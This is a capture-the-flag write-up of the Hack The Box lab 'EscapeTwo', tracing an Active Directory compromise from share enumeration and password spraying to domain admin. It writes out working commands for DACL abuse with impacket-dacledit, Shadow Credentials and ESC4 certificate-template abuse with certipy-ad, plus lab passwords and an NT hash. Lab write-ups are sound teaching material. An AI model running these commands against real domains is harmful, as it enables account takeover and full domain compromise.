EscapeTwo - HackMD

# EscapeTwo ## 0x1 Recon * ![image](https://hackmd.io/_uploads/Bk_2Jcvh1x.png) ### Rustscan * ![image](https://hackmd.io/_uploads/rJJYJ9Pnyg.png) ### Nmap * ![image](https://hackmd.io/_uploads/SkcjPcw3ye.png) ## 0x2 Enumeration * Use `nxc` enum the ldap users * ![image](https://hackmd.io/_uploads/B1eO_9P3Jx.png) * Share folders * ![image](https://hackmd.io/_uploads/S1QLocv21l.png) ## 0x3 SMB files * Files under the `Users` folder * ![image](https://hackmd.io/_uploads/ryDr8oDnyx.png) * Files under the `Accouting Department` * ![image](https://hackmd.io/_uploads/Hy2QjownJe.png) * Found some user cred in `accounts.xlsx` * ![image](https://hackmd.io/_uploads/r11epsPn1g.png) ## 0x4 credential sparying * Make user list with ldap users * ![image](https://hackmd.io/_uploads/rJ37Ghw2ye.png) * try to crack winrm user, but everyone can connect to winrm * Only two users have ldap permition * ![image](https://hackmd.io/_uploads/HJmxU2v3yl.png) ## 0x5 MSSQL * Got mssql user * ![image](https://hackmd.io/_uploads/SkRgOhwhyl.png) * Another user cred in `C:\\SQL2019\ExpressAdv_ENU\sql-Configuration.INI` * ![image](https://hackmd.io/_uploads/HkqV02P21l.png) * Use this password keep sparying with ldap&winrm * ![image](https://hackmd.io/_uploads/B1hXk6whJl.png) ## 0x6 Get shell & User.txt * Use `evil-winrm` get shell with user ryan,and get user flag * ![image](https://hackmd.io/_uploads/By02kaD3ye.png) ## 0x7 Privilege Escalation ### [WriteOwner](![image](https://hackmd.io/_uploads/H1LBZ1O3yx.png)) * User `ca_svc` belong Cert Publisher group * ![image](https://hackmd.io/_uploads/S1rNKkK21g.png) * Use `bloodhound` eunmeration user ryan * ![image](https://hackmd.io/_uploads/SyJd7Rwnkg.png) * Found Ryan have WriteOwner privilege to CA_SVC * ![image](https://hackmd.io/_uploads/BksQIADnJx.png) * Import `Powersploit` module ```powershell= git clone https://github.com/PowerShellMafia/PowerSploit.git Import-Module .\PowerSploit\Recon\PowerView.ps1 or IEX (Get-Content .\PowerSploit\Recon\PowerView.ps1 -Raw) ``` * Use 'bloodyAD' set `ryan` as owner * ![image](https://hackmd.io/_uploads/ryJ2x1uhJg.png) * Take fullcontrol to tager user ```powershell= impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3" ``` *![image](https://hackmd.io/_uploads/SkyviJKhyg.png) ### [ShadowCredentials](https://exploit-notes.hdks.org/exploit/windows/active-directory/shadow-credentials/) :::info If the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates, he takes over the account in AD. ::: :::info Shadow Credentials 是一種將假憑證（Kerberos key credential）綁定到目標帳戶的方法。即使目標帳戶的密碼被更改，你仍可使用該假憑證進行身份驗證。這是一種無需修改目標帳戶密碼的隱秘持久化技術。 ::: * When I try to use `certpy-ad` generate fake credential, it shows our clock is too slow to machine * ![image](https://hackmd.io/_uploads/ByNQkeF3Je.png) * ![image](https://hackmd.io/_uploads/ByDNxxK21x.png) * Run `ntpdate` update the time to machine ```bash= sudo ntpdate escapetwo.htb ``` * Got `ca_svc`'s NT hash * ![image](https://hackmd.io/_uploads/HyN0WeF2kg.png) ```bash= certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -target escapetwo.htb -dc-ip 10.10.11.51 -ns 10.10.11.51 ``` * Runing `certipy-ad` find vulnerable templates found Template Name call `DunderMifflinAuthentication` vulnerabilities `ESC4` * ![image](https://hackmd.io/_uploads/SkcK8eK3Jx.png) * ![image](https://hackmd.io/_uploads/B1ocLeY2Jx.png) ### Use vulnerable template * ![image](https://hackmd.io/_uploads/SJnXFetnJe.png) ```bash= certipy-ad template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -k -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.10.11.51 -debug ``` ### Request for administrator's template * This step must do quikly after you update the template,or you'll got error about DNS name error ```bash= certipy-ad req -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb -target DC01.sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -dc-ip 10.10.11.51 ``` * ![image](https://hackmd.io/_uploads/BJcJs-Fnyg.png) ### Pass admin's identity authentication * You will get NT HASH after authenticating using pfx certificate * ![image](https://hackmd.io/_uploads/SJnEa-K3kl.png) ```bash= certipy-ad auth -pfx administrator_10.pfx ``` ## 0x8 root.txt * ![image](https://hackmd.io/_uploads/ryEF6WYhyx.png)